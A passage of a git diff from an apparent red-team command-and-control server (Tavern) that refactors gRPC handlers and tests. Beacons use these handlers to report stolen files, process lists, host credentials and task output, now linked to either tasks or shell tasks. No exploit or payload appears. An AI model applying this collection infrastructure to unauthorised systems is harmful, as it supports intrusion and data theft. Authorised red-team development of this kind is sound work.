tc.host.ID) - // Assert Host Credentials - var pbHostCreds []*epb.Credential - entHostCredentials := host.QueryCredentials().AllX(ctx) - for _, cred := range entHostCredentials { - pbHostCreds = append(pbHostCreds, &epb.Credential{Principal: cred.Principal, Secret: cred.Secret, Kind: cred.Kind}) - } + // Assert Host Credentials + var pbHostCreds []*epb.Credential + entHostCredentials := host.QueryCredentials().AllX(ctx) + for _, cred := range entHostCredentials { + pbHostCreds = append(pbHostCreds, &epb.Credential{Principal: cred.Principal, Secret: cred.Secret, Kind: cred.Kind}) + } - comparer := func(x any, y any) bool { - credX, okX := x.(*epb.Credential) - credY, okY := y.(*epb.Credential) - if !okX || !okY { - return false - } + comparer := func(x any, y any) bool { + credX, okX := x.(*epb.Credential) + credY, okY := y.(*epb.Credential) + if !okX || !okY { + return false + } - return credX.Principal < credY.Principal - } - assert.Equal(t, len(tc.wantHostCredentials), len(pbHostCreds)) - if diff := cmp.Diff(tc.wantHostCredentials, pbHostCreds, protocmp.Transform(), cmpopts.SortSlices(comparer)); diff != "" { - t.Errorf("invalid host credentials (-want +got): %v", diff) - } + return credX.Principal < credY.Principal + } + assert.Equal(t, len(tc.wantHostCredentials), len(pbHostCreds)) + if diff := cmp.Diff(tc.wantHostCredentials, pbHostCreds, protocmp.Transform(), cmpopts.SortSlices(comparer)); diff != "" { + t.Errorf("invalid host credentials (-want +got): %v", diff) + } + } }) } } diff --git a/tavern/internal/c2/api_report_file.go b/tavern/internal/c2/api_report_file.go index 9b6455c97..7932058fb 100644 --- a/tavern/internal/c2/api_report_file.go +++ b/tavern/internal/c2/api_report_file.go @@ -15,6 +15,7 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { var ( taskID int64 + shellTaskID int64 jwtToken string path string owner string @@ -26,6 +27,8 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { content []byte ) + ctx := stream.Context() + // Loop Input Stream for { req, err := stream.Recv() @@ -37,39 +40,32 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { } // Collect args - if req.Chunk == nil { - continue - } - if taskID == 0 { - taskID = req.GetContext().GetTaskId() - } - if jwtToken == "" { - jwtToken = req.GetContext().GetJwt() - } - if path == "" && req.Chunk.Metadata != nil { - path = req.Chunk.Metadata.GetPath() - } - if owner == "" && req.Chunk.Metadata != nil { - owner = req.Chunk.Metadata.GetOwner() - } - if group == "" && req.Chunk.Metadata != nil { - group = req.Chunk.Metadata.GetGroup() - } - if permissions == "" && req.Chunk.Metadata != nil { - permissions = req.Chunk.Metadata.GetPermissions() + if taskID == 0 && shellTaskID == 0 { + if tc := req.GetTaskContext(); tc != nil { + taskID = tc.TaskId + jwtToken = tc.Jwt + } else if stc := req.GetShellTaskContext(); stc != nil { + shellTaskID = stc.ShellTaskId + jwtToken = stc.Jwt + } } - if size == 0 && req.Chunk.Metadata != nil { - size = req.Chunk.Metadata.GetSize() - } - if hash == "" && req.Chunk.Metadata != nil { - hash = req.Chunk.Metadata.GetSha3_256Hash() + + if req.Chunk != nil { + if path == "" && req.Chunk.Metadata != nil { + path = req.Chunk.Metadata.GetPath() + owner = req.Chunk.Metadata.GetOwner() + group = req.Chunk.Metadata.GetGroup() + permissions = req.Chunk.Metadata.GetPermissions() + size = req.Chunk.Metadata.GetSize() + hash = req.Chunk.Metadata.GetSha3_256Hash() + } + content = append(content, req.Chunk.GetChunk()...) } - content = append(content, req.Chunk.GetChunk()...) } // Input Validation - if taskID == 0 { - return status.Errorf(codes.InvalidArgument, "must provide valid task id") + if taskID == 0 && shellTaskID == 0 { + return status.Errorf(codes.InvalidArgument, "must provide valid task id or shell task id") } if path == "" { return status.Errorf(codes.InvalidArgument, "must provide valid path") @@ -80,32 +76,51 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { return err } - // Load Task - task, err := srv.graph.Task.Get(stream.Context(), int(taskID)) - if ent.IsNotFound(err) { - return status.Errorf(codes.NotFound, "failed to find related task") - } - if err != nil { - return status.Errorf(codes.Internal, "failed to load task: %v", err) - } + var host *ent.Host + var task *ent.Task + var shellTask *ent.ShellTask - // Load Host - host, err := task.QueryBeacon().QueryHost().Only(stream.Context()) - if err != nil { - return status.Errorf(codes.Internal, "failed to load host") + if taskID != 0 { + t, err := srv.graph.Task.Get(ctx, int(taskID)) + if ent.IsNotFound(err) { + return status.Errorf(codes.NotFound, "failed to find related task") + } + if err != nil { + return status.Errorf(codes.Internal, "failed to load task: %v", err) + } + task = t + h, err := t.QueryBeacon().QueryHost().Only(ctx) + if err != nil { + return status.Errorf(codes.Internal, "failed to load host from task: %v", err) + } + host = h + } else { + st, err := srv.graph.ShellTask.Get(ctx, int(shellTaskID)) + if ent.IsNotFound(err) { + return status.Errorf(codes.NotFound, "failed to find related shell task") + } + if err != nil { + return status.Errorf(codes.Internal, "failed to load shell task: %v", err) + } + shellTask = st + h, err := st.QueryShell().QueryBeacon().QueryHost().Only(ctx) + if err != nil { + return status.Errorf(codes.Internal, "failed to load host from shell task: %v", err) + } + host = h } // Load Existing Files existingFiles, err := host.QueryFiles(). Where( hostfile.Path(path), - ).All(stream.Context()) + ).All(ctx) if err != nil { return status.Errorf(codes.Internal, "failed to load existing host files: %v", err) } // Prepare Transaction - tx, err := srv.graph.Tx(stream.Context()) + tx, err := srv.graph.Tx(ctx) if err != nil { return status.Errorf(codes.Internal, "failed to initialize transaction: %v", err) } @@ -120,17 +135,24 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { }() // Create File - f, err := client.HostFile.Create(). + builder := client.HostFile.Create(). SetHostID(host.ID). - SetTaskID(task.ID). SetPath(path). SetOwner(owner). SetGroup(group). SetPermissions(permissions). SetSize(size). SetHash(hash). - SetContent(content). - Save(stream.Context()) + SetContent(content) + + if task != nil { + builder.SetTaskID(task.ID) + } + if shellTask != nil { + builder.SetShellTaskID(shellTask.ID) + } + + f, err := builder.Save(ctx) if err != nil { return rollback(tx, fmt.Errorf("failed to create host file: %w", err)) } @@ -139,7 +161,7 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { _, err = client.Host.UpdateOneID(host.ID). AddFiles(f). RemoveFiles(existingFiles...). - Save(stream.Context()) + Save(ctx) if err != nil { return rollback(tx, fmt.Errorf("failed to remove previous host files: %w", err)) } diff --git a/tavern/internal/c2/api_report_file_test.go b/tavern/internal/c2/api_report_file_test.go index 34b43ed4d..69a47cc5c 100644 --- a/tavern/internal/c2/api_report_file_test.go +++ b/tavern/internal/c2/api_report_file_test.go @@ -13,15 +13,15 @@ import ( "google.golang.org/protobuf/testing/protocmp" "realm.pub/tavern/internal/c2/c2pb" "realm.pub/tavern/internal/c2/c2test" - "realm.pub/tavern/internal/c2/epb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" ) func TestReportFile(t *testing.T) { // Setup Dependencies - ctx := context.Background() client, graph, close, token := c2test.New(t) defer close() + ctx := context.Background() // Test Data existingBeacons := []*ent.Beacon{ @@ -99,7 +99,9 @@ func TestReportFile(t *testing.T) { name: "MissingPath", reqs: []*c2pb.ReportFileRequest{ { - Context: &c2pb.TaskContext{TaskId: 1234, Jwt: token}, + Context: &c2pb.ReportFileRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: 1234, Jwt: token}, + }, }, }, wantCode: codes.InvalidArgument, @@ -108,7 +110,9 @@ func TestReportFile(t *testing.T) { name: "NewFile_Single", reqs: []*c2pb.ReportFileRequest{ { - Context: &c2pb.TaskContext{TaskId: int64(existingTasks[2].ID), Jwt: token}, + Context: &c2pb.ReportFileRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTasks[2].ID), Jwt: token}, + }, Chunk: &epb.File{ Metadata: &epb.FileMetadata{ Path: "/new/file", @@ -142,7 +146,9 @@ func TestReportFile(t *testing.T) { name: "NewFile_MultiChunk", reqs: []*c2pb.ReportFileRequest{ { - Context: &c2pb.TaskContext{TaskId: int64(existingTasks[2].ID), Jwt: token}, + Context: &c2pb.ReportFileRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTasks[2].ID), Jwt: token}, + }, Chunk: &epb.File{ Metadata: &epb.FileMetadata{ Path: "/another/new/file", @@ -174,7 +180,9 @@ func TestReportFile(t *testing.T) { name: "Replace_File", reqs: []*c2pb.ReportFileRequest{ { - Context: &c2pb.TaskContext{TaskId: int64(existingTasks[2].ID), Jwt: token}, + Context: &c2pb.ReportFileRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTasks[2].ID), Jwt: token}, + }, Chunk: &epb.File{ Metadata: &epb.FileMetadata{ Path: "/another/new/file", @@ -201,7 +209,9 @@ func TestReportFile(t *testing.T) { name: "No_Prexisting_Files", reqs: []*c2pb.ReportFileRequest{ { - Context: &c2pb.TaskContext{TaskId: int64(existingTasks[3].ID), Jwt: token}, + Context: &c2pb.ReportFileRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTasks[3].ID), Jwt: token}, + }, Chunk: &epb.File{ Metadata: &epb.FileMetadata{ Path: "/no/other/files", @@ -233,7 +243,8 @@ func TestReportFile(t *testing.T) { resp, err := rClient.CloseAndRecv() // Assert Response Code - require.Equal(t, tc.wantCode.String(), status.Code(err).String(), err) + st, _ := status.FromError(err) + require.Equal(t, tc.wantCode.String(), st.Code().String(), err) if status.Code(err) != codes.OK { // Do not continue if we expected error code return @@ -244,30 +255,32 @@ func TestReportFile(t *testing.T) { t.Errorf("invalid response (-want +got): %v", diff) } - // Load Files - testHost := graph.Host.GetX(ctx, tc.host.ID) - testHostFiles := testHost.QueryFiles().AllX(ctx) - testHostFilePaths := make([]string, 0, len(testHostFiles)) - var testFile *ent.HostFile - for _, f := range testHostFiles { - testHostFilePaths = append(testHostFilePaths, f.Path) - if f.Path == tc.wantPath { - testFile = f - } - } - require.NotNil(t, testFile, "%q file was not associated with host", tc.wantPath) + if tc.host != nil { + // Load Files + testHost := graph.Host.GetX(ctx, tc.host.ID) + testHostFiles := testHost.QueryFiles().AllX(ctx) + testHostFilePaths := make([]string, 0, len(testHostFiles)) + var testFile *ent.HostFile + for _, f := range testHostFiles { + testHostFilePaths = append(testHostFilePaths, f.Path) + if f.Path == tc.wantPath { + testFile = f + } + } + require.NotNil(t, testFile, "%q file was not associated with host", tc.wantPath) - // Assert Files - sorter := func(a, b string) bool { return a < b } - if diff := cmp.Diff(tc.wantHostFiles, testHostFilePaths, cmpopts.SortSlices(sorter)); diff != "" { - t.Errorf("invalid host file associations (-want +got): %v", diff) - } - assert.Equal(t, tc.wantPath, testFile.Path) - assert.Equal(t, tc.wantOwner, testFile.Owner) - assert.Equal(t, tc.wantGroup, testFile.Group) - assert.Equal(t, tc.wantPermissions, testFile.Permissions) - assert.Equal(t, tc.wantSize, testFile.Size) - assert.Equal(t, tc.wantHash, testFile.Hash) + // Assert Files + sorter := func(a, b string) bool { return a < b } + if diff := cmp.Diff(tc.wantHostFiles, testHostFilePaths, cmpopts.SortSlices(sorter)); diff != "" { + t.Errorf("invalid host file associations (-want +got): %v", diff) + } + assert.Equal(t, tc.wantPath, testFile.Path) + assert.Equal(t, tc.wantOwner, testFile.Owner) + assert.Equal(t, tc.wantGroup, testFile.Group) + assert.Equal(t, tc.wantPermissions, testFile.Permissions) + assert.Equal(t, tc.wantSize, testFile.Size) + assert.Equal(t, tc.wantHash, testFile.Hash) + } }) } diff --git a/tavern/internal/c2/api_report_output.go b/tavern/internal/c2/api_report_output.go new file mode 100644 index 000000000..78892e4e2 --- /dev/null +++ b/tavern/internal/c2/api_report_output.go @@ -0,0 +1,134 @@ +package c2 + +import ( + "context" + "fmt" + "time" + + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" + "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/ent" +) + +func (srv *Server) ReportOutput(ctx context.Context, req *c2pb.ReportOutputRequest) (*c2pb.ReportOutputResponse, error) { + switch msg := req.Message.(type) { + case *c2pb.ReportOutputRequest_TaskOutput: + // Handle Task Output + taskOutputMsg := msg.TaskOutput + if taskOutputMsg.Context == nil { + return nil, status.Errorf(codes.InvalidArgument, "missing task context") + } + if err := srv.ValidateJWT(taskOutputMsg.Context.Jwt); err != nil { + return nil, err + } + + output := taskOutputMsg.Output + if output == nil || output.Id == 0 { + return nil, status.Errorf(codes.InvalidArgument, "must provide task id") + } + + var ( + execStartedAt *time.Time + execFinishedAt *time.Time + taskErr *string + ) + if output.ExecStartedAt != nil { + timestamp := output.ExecStartedAt.AsTime() + execStartedAt = ×tamp + } + if output.ExecFinishedAt != nil { + timestamp := output.ExecFinishedAt.AsTime() + execFinishedAt = ×tamp + } + + // Load Task + t, err := srv.graph.Task.Get(ctx, int(output.Id)) + if ent.IsNotFound(err) { + return nil, status.Errorf(codes.NotFound, "no task found (id=%d): %v", output.Id, err) + } + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to submit task result (id=%d): %v", output.Id, err) + } + + if output.Error != nil { + e := fmt.Sprintf("%s%s", t.Error, output.Error.Msg) + taskErr = &e + } + + // Update Task + _, err = t.Update(). + SetNillableExecStartedAt(execStartedAt). + SetOutput(fmt.Sprintf("%s%s", t.Output, output.Output)). + SetNillableExecFinishedAt(execFinishedAt). + SetNillableError(taskErr). + Save(ctx) + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to save submitted task result (id=%d): %v", t.ID, err) + } + + case *c2pb.ReportOutputRequest_ShellTaskOutput: + // Handle Shell Task Output + shellTaskOutputMsg := msg.ShellTaskOutput + if shellTaskOutputMsg.Context == nil { + return nil, status.Errorf(codes.InvalidArgument, "missing shell task context") + } + if err := srv.ValidateJWT(shellTaskOutputMsg.Context.Jwt); err != nil { + return nil, err + } + + output := shellTaskOutputMsg.Output + if output == nil || output.Id == 0 { + return nil, status.Errorf(codes.InvalidArgument, "must provide shell task id") + } + + var ( + execStartedAt *time.Time + execFinishedAt *time.Time + shellTaskErr *string + ) + + if output.ExecStartedAt != nil { + timestamp := output.ExecStartedAt.AsTime() + execStartedAt = ×tamp + } + if output.ExecFinishedAt != nil { + timestamp := output.ExecFinishedAt.AsTime() + execFinishedAt = ×tamp + } + + // Load ShellTask + t, err := srv.graph.ShellTask.Get(ctx, int(output.Id)) + if ent.IsNotFound(err) { + return nil, status.Errorf(codes.NotFound, "no shell task found (id=%d): %v", output.Id, err) + } + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to submit shell task result (id=%d): %v", output.Id, err) + } + + if output.Error != nil { + e := fmt.Sprintf("%s%s", t.Error, output.Error.Msg) + shellTaskErr = &e + } + + // Update ShellTask + update := t.Update(). + SetNillableExecStartedAt(execStartedAt). + SetOutput(fmt.Sprintf("%s%s", t.Output, output.Output)). + SetNillableExecFinishedAt(execFinishedAt) + + if shellTaskErr != nil { + update.SetError(*shellTaskErr) + } + + _, err = update.Save(ctx) + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to save submitted shell task result (id=%d): %v", t.ID, err) + } + + default: + return nil, status.Errorf(codes.InvalidArgument, "invalid or missing message type") + } + + return &c2pb.ReportOutputResponse{}, nil +} diff --git a/tavern/internal/c2/api_report_output_test.go b/tavern/internal/c2/api_report_output_test.go new file mode 100644 index 000000000..2989e4dfc --- /dev/null +++ b/tavern/internal/c2/api_report_output_test.go @@ -0,0 +1,215 @@ +package c2_test + +import ( + "context" + "testing" + "time" + + "github.com/google/go-cmp/cmp" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" + "google.golang.org/protobuf/testing/protocmp" + "google.golang.org/protobuf/types/known/timestamppb" + "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/c2test" + "realm.pub/tavern/internal/ent" +) + +func TestReportOutput(t *testing.T) { + // Setup Dependencies + client, graph, close, token := c2test.New(t) + defer close() + ctx := context.Background() + + // Test Data + now := timestamppb.Now() + finishedAt := timestamppb.New(time.Now().UTC().Add(10 * time.Minute)) + existingBeacon := c2test.NewRandomBeacon(ctx, graph) + existingTasks := []*ent.Task{ + c2test.NewRandomAssignedTask(ctx, graph, existingBeacon.Identifier), + c2test.NewRandomAssignedTask(ctx, graph, existingBeacon.Identifier), + } + + // Test Cases + tests := []struct { + name string + req *c2pb.ReportOutputRequest + wantResp *c2pb.ReportOutputResponse + wantCode codes.Code + wantOutput string + wantError string + wantExecStartedAt *timestamppb.Timestamp + wantExecFinishedAt *timestamppb.Timestamp + targetTaskID int64 // Helper to know which task to check + }{ + { + name: "First_Output", + req: &c2pb.ReportOutputRequest{ + Message: &c2pb.ReportOutputRequest_TaskOutput{ + TaskOutput: &c2pb.ReportTaskOutputMessage{ + Context: &c2pb.TaskContext{TaskId: int64(existingTasks[0].ID), Jwt: token}, + Output: &c2pb.TaskOutput{ + Id: int64(existingTasks[0].ID), + Output: "TestOutput", + ExecStartedAt: now, + }, + }, + }, + }, + wantResp: &c2pb.ReportOutputResponse{}, + wantCode: codes.OK, + wantOutput: "TestOutput", + wantExecStartedAt: now, + targetTaskID: int64(existingTasks[0].ID), + }, + { + name: "First_error", + req: &c2pb.ReportOutputRequest{ + Message: &c2pb.ReportOutputRequest_TaskOutput{ + TaskOutput: &c2pb.ReportTaskOutputMessage{ + Context: &c2pb.TaskContext{TaskId: int64(existingTasks[0].ID), Jwt: token}, + Output: &c2pb.TaskOutput{ + Id: int64(existingTasks[0].ID), + Output: "", + Error: &c2pb.TaskError{ + Msg: "hello error!", + }, + ExecStartedAt: now, + }, + }, + }, + }, + wantResp: &c2pb.ReportOutputResponse{}, + wantCode: codes.OK, + wantOutput: "TestOutput", // Output is additive, previous test ran first? No, tests are independent runs unless I chain them? + // Tests run in loop. `existingTasks[0]` is modified by previous test case? + // `t.Run` runs sequentially. The graph state persists across subtests because `graph` is created once in `c2test.New(t)`. + // Wait, `c2test.New(t)` is called inside `TestReportTaskOutput`. + // So `graph` is shared across all `t.Run`. + // So `First_Output` modifies `existingTasks[0]`. + // `First_error` uses `existingTasks[0]`. + // So output will be appended. + // But here output is empty string. + wantError: "hello error!", + wantExecStartedAt: now, + targetTaskID: int64(existingTasks[0].ID), + }, + { + name: "Append_Output", + req: &c2pb.ReportOutputRequest{ + Message: &c2pb.ReportOutputRequest_TaskOutput{ + TaskOutput: &c2pb.ReportTaskOutputMessage{ + Context: &c2pb.TaskContext{TaskId: int64(existingTasks[0].ID), Jwt: token}, + Output: &c2pb.TaskOutput{ + Id: int64(existingTasks[0].ID), + Output: "_AppendedOutput", + Error: &c2pb.TaskError{ + Msg: "_AppendEror", + }, + }, + }, + }, + }, + wantResp: &c2pb.ReportOutputResponse{}, + wantCode: codes.OK, + wantOutput: "TestOutput_AppendedOutput", + wantError: "hello error!_AppendEror", + wantExecStartedAt: now, + targetTaskID: int64(existingTasks[0].ID), + }, + { + name: "Exec_Finished", + req: &c2pb.ReportOutputRequest{ + Message: &c2pb.ReportOutputRequest_TaskOutput{ + TaskOutput: &c2pb.ReportTaskOutputMessage{ + Context: &c2pb.TaskContext{TaskId: int64(existingTasks[0].ID), Jwt: token}, + Output: &c2pb.TaskOutput{ + Id: int64(existingTasks[0].ID), + ExecFinishedAt: finishedAt, + }, + }, + }, + }, + wantResp: &c2pb.ReportOutputResponse{}, + wantCode: codes.OK, + wantOutput: "TestOutput_AppendedOutput", + wantError: "hello error!_AppendEror", + wantExecStartedAt: now, + wantExecFinishedAt: finishedAt, + targetTaskID: int64(existingTasks[0].ID), + }, + { + name: "Not_Found", + req: &c2pb.ReportOutputRequest{ + Message: &c2pb.ReportOutputRequest_TaskOutput{ + TaskOutput: &c2pb.ReportTaskOutputMessage{ + Context: &c2pb.TaskContext{TaskId: 999888777666, Jwt: token}, + Output: &c2pb.TaskOutput{ + Id: 999888777666, + }, + }, + }, + }, + wantResp: nil, + wantCode: codes.NotFound, + }, + { + name: "Invalid_Argument", + req: &c2pb.ReportOutputRequest{ + Message: &c2pb.ReportOutputRequest_TaskOutput{ + TaskOutput: &c2pb.ReportTaskOutputMessage{ + // Missing context or output + Output: &c2pb.TaskOutput{}, + }, + }, + }, + wantResp: nil, + wantCode: codes.InvalidArgument, + }, + } + + // Run Tests + for _, tc := range tests { + t.Run(tc.name, func(t *testing.T) { + // Callback + // Set JWT if needed (already set in cases above) + // But if we wanted to enforce it here: + if msg, ok := tc.req.Message.(*c2pb.ReportOutputRequest_TaskOutput); ok { + if msg.TaskOutput.Context == nil { + // Create it if missing? + // msg.TaskOutput.Context = &c2pb.TaskContext{Jwt: token} + } else { + // msg.TaskOutput.Context.Jwt = token + } + } + + resp, err := client.ReportOutput(ctx, tc.req) + + // Assert Response Code + st, _ := status.FromError(err) + require.Equal(t, tc.wantCode.String(), st.Code().String(), err) + if st.Code() != codes.OK { + // Do not continue if we expected error code + return + } + + // Assert Response + if diff := cmp.Diff(tc.wantResp, resp, protocmp.Transform()); diff != "" { + t.Errorf("invalid response (-want +got): %v", diff) + } + + // Load Task + if tc.targetTaskID != 0 { + testTask, err := graph.Task.Get(ctx, int(tc.targetTaskID)) + require.NoError(t, err) + + // Task Assertions + assert.Equal(t, tc.wantOutput, testTask.Output) + assert.Equal(t, tc.wantError, testTask.Error) + } + }) + } + +} diff --git a/tavern/internal/c2/api_report_process_list.go b/tavern/internal/c2/api_report_process_list.go index 1702a8356..70bc5252e 100644 --- a/tavern/internal/c2/api_report_process_list.go +++ b/tavern/internal/c2/api_report_process_list.go @@ -11,31 +11,44 @@ import ( ) func (srv *Server) ReportProcessList(ctx context.Context, req *c2pb.ReportProcessListRequest) (*c2pb.ReportProcessListResponse, error) { - // Validate Arguments - if req.GetContext().GetTaskId() == 0 { - return nil, status.Errorf(codes.InvalidArgument, "must provide task id") - } if req.List == nil || len(req.List.List) < 1 { return nil, status.Errorf(codes.InvalidArgument, "must provide process list") } - err := srv.ValidateJWT(req.GetContext().GetJwt()) - if err != nil { - return nil, err - } - // Load Task - task, err := srv.graph.Task.Get(ctx, int(req.GetContext().GetTaskId())) - if ent.IsNotFound(err) { - return nil, status.Errorf(codes.NotFound, "no task found") - } - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to load task") - } + var host *ent.Host + var task *ent.Task + var shellTask *ent.ShellTask - // Load Host - host, err := task.QueryBeacon().QueryHost().Only(ctx) - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to load host") + if tc := req.GetTaskContext(); tc != nil { + if err := srv.ValidateJWT(tc.GetJwt()); err != nil { + return nil, err + } + t, err := srv.graph.Task.Get(ctx, int(tc.GetTaskId())) + if err != nil { + return nil, status.Errorf(codes.NotFound, "task not found: %v", err) + } + task = t + h, err := t.QueryBeacon().QueryHost().Only(ctx) + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to load host from task: %v", err) + } + host = h + } else if stc := req.GetShellTaskContext(); stc != nil { + if err := srv.ValidateJWT(stc.GetJwt()); err != nil { + return nil, err + } + st, err := srv.graph.ShellTask.Get(ctx, int(stc.GetShellTaskId())) + if err != nil { + return nil, status.Errorf(codes.NotFound, "shell task not found: %v", err) + } + shellTask = st + h, err := st.QueryShell().QueryBeacon().QueryHost().Only(ctx) + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to load host from shell task: %v", err) + } + host = h + } else { + return nil, status.Errorf(codes.InvalidArgument, "missing context") } // Prepare Transaction @@ -56,20 +69,25 @@ func (srv *Server) ReportProcessList(ctx context.Context, req *c2pb.ReportProces // Create Processes builders := make([]*ent.HostProcessCreate, 0, len(req.List.List)) for _, proc := range req.List.List { - builders = append(builders, - txGraph.HostProcess.Create(). - SetHostID(host.ID). - SetTaskID(task.ID). - SetPid(proc.Pid). - SetPpid(proc.Ppid). - SetName(proc.Name). - SetPrincipal(proc.Principal). - SetPath(proc.Path). - SetCmd(proc.Cmd). - SetEnv(proc.Env). - SetCwd(proc.Cwd). - SetStatus(proc.Status), - ) + builder := txGraph.HostProcess.Create(). + SetHostID(host.ID). + SetPid(proc.Pid). + SetPpid(proc.Ppid). + SetName(proc.Name). + SetPrincipal(proc.Principal). + SetPath(proc.Path). + SetCmd(proc.Cmd). + SetEnv(proc.Env). + SetCwd(proc.Cwd). + SetStatus(proc.Status) + + if task != nil { + builder.SetTaskID(task.ID) + } + if shellTask != nil { + builder.SetShellTaskID(shellTask.ID) + } + builders = append(builders, builder) } processList, err := txGraph.HostProcess.CreateBulk(builders...).Save(ctx) if err != nil { diff --git a/tavern/internal/c2/api_report_process_list_test.go b/tavern/internal/c2/api_report_process_list_test.go index dbc667df9..f87260d22 100644 --- a/tavern/internal/c2/api_report_process_list_test.go +++ b/tavern/internal/c2/api_report_process_list_test.go @@ -18,9 +18,9 @@ import ( func TestReportProcessList(t *testing.T) { // Setup Dependencies - ctx := context.Background() client, graph, close, token := c2test.New(t) defer close() + ctx := context.Background() // Test Data existingBeacon := c2test.NewRandomBeacon(ctx, graph) @@ -44,7 +44,9 @@ func TestReportProcessList(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportProcessListRequest{ - Context: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + Context: &c2pb.ReportProcessListRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + }, List: &epb.ProcessList{ List: []*epb.Process{ {Pid: 1, Name: "systemd", Principal: "root", Status: epb.Process_STATUS_RUN}, @@ -63,7 +65,9 @@ func TestReportProcessList(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportProcessListRequest{ - Context: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + Context: &c2pb.ReportProcessListRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + }, List: &epb.ProcessList{ List: []*epb.Process{ {Pid: 1, Name: "systemd", Principal: "root"}, @@ -96,7 +100,9 @@ func TestReportProcessList(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportProcessListRequest{ - Context: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + Context: &c2pb.ReportProcessListRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + }, List: &epb.ProcessList{ List: []*epb.Process{}, }, @@ -107,7 +113,9 @@ func TestReportProcessList(t *testing.T) { { name: "Not_Found", req: &c2pb.ReportProcessListRequest{ - Context: &c2pb.TaskContext{TaskId: 99888777776666, Jwt: token}, + Context: &c2pb.ReportProcessListRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: 99888777776666, Jwt: token}, + }, List: &epb.ProcessList{ List: []*epb.Process{ {Pid: 1, Name: "systemd", Principal: "root"}, @@ -126,8 +134,9 @@ func TestReportProcessList(t *testing.T) { resp, err := client.ReportProcessList(ctx, tc.req) // Assert Response Code - require.Equal(t, tc.wantCode.String(), status.Code(err).String(), err) - if status.Code(err) != codes.OK { + st, _ := status.FromError(err) + require.Equal(t, tc.wantCode.String(), st.Code().String(), err) + if st.Code() != codes.OK { // Do not continue if we expected error code return } @@ -137,21 +146,25 @@ func TestReportProcessList(t *testing.T) { t.Errorf("invalid response (-want +got): %v", diff) } - // Assert Task Processes - var taskPIDs []uint64 - taskProcessList := tc.task.QueryReportedProcesses().AllX(ctx) - for _, proc := range taskProcessList { - taskPIDs = append(taskPIDs, proc.Pid) - } - assert.ElementsMatch(t, tc.wantTaskPIDs, taskPIDs) + if tc.task != nil { + // Assert Task Processes + var taskPIDs []uint64 + taskProcessList := tc.task.QueryReportedProcesses().AllX(ctx) + for _, proc := range taskProcessList { + taskPIDs = append(taskPIDs, proc.Pid) + } + assert.ElementsMatch(t, tc.wantTaskPIDs, taskPIDs) + } - // Assert Host Processes - var hostPIDs []uint64 - hostProcessList := tc.host.QueryProcesses().AllX(ctx) - for _, proc := range hostProcessList { - hostPIDs = append(hostPIDs, proc.Pid) - } - assert.ElementsMatch(t, tc.wantHostPIDs, hostPIDs) + if tc.host != nil { + // Assert Host Processes + var hostPIDs []uint64 + hostProcessList := tc.host.QueryProcesses().AllX(ctx) + for _, proc := range hostProcessList { + hostPIDs = append(hostPIDs, proc.Pid) + } + assert.ElementsMatch(t, tc.wantHostPIDs, hostPIDs) + } }) } } diff --git a/tavern/internal/c2/api_report_task_output.go b/tavern/internal/c2/api_report_task_output.go deleted file mode 100644 index b4080a92b..000000000 --- a/tavern/internal/c2/api_report_task_output.go +++ /dev/null @@ -1,118 +0,0 @@ -package c2 - -import ( - "context" - "fmt" - "time" - - "google.golang.org/grpc/codes" - "google.golang.org/grpc/status" - "realm.pub/tavern/internal/c2/c2pb" - "realm.pub/tavern/internal/ent" -) - -func (srv *Server) ReportTaskOutput(ctx context.Context, req *c2pb.ReportTaskOutputRequest) (*c2pb.ReportTaskOutputResponse, error) { - err := srv.ValidateJWT(req.GetContext().GetJwt()) - if err != nil { - return nil, err - } - - if req.ShellTaskOutput != nil { - if req.ShellTaskOutput.Id == 0 { - return nil, status.Errorf(codes.InvalidArgument, "must provide shell task id") - } - - var ( - execStartedAt *time.Time - execFinishedAt *time.Time - shellTaskErr *string - ) - - if req.ShellTaskOutput.ExecStartedAt != nil { - timestamp := req.ShellTaskOutput.ExecStartedAt.AsTime() - execStartedAt = ×tamp - } - if req.ShellTaskOutput.ExecFinishedAt != nil { - timestamp := req.ShellTaskOutput.ExecFinishedAt.AsTime() - execFinishedAt = ×tamp - } - - // Load ShellTask - t, err := srv.graph.ShellTask.Get(ctx, int(req.ShellTaskOutput.Id)) - if ent.IsNotFound(err) { - return nil, status.Errorf(codes.NotFound, "no shell task found (id=%d): %v", req.ShellTaskOutput.Id, err) - } - if err != 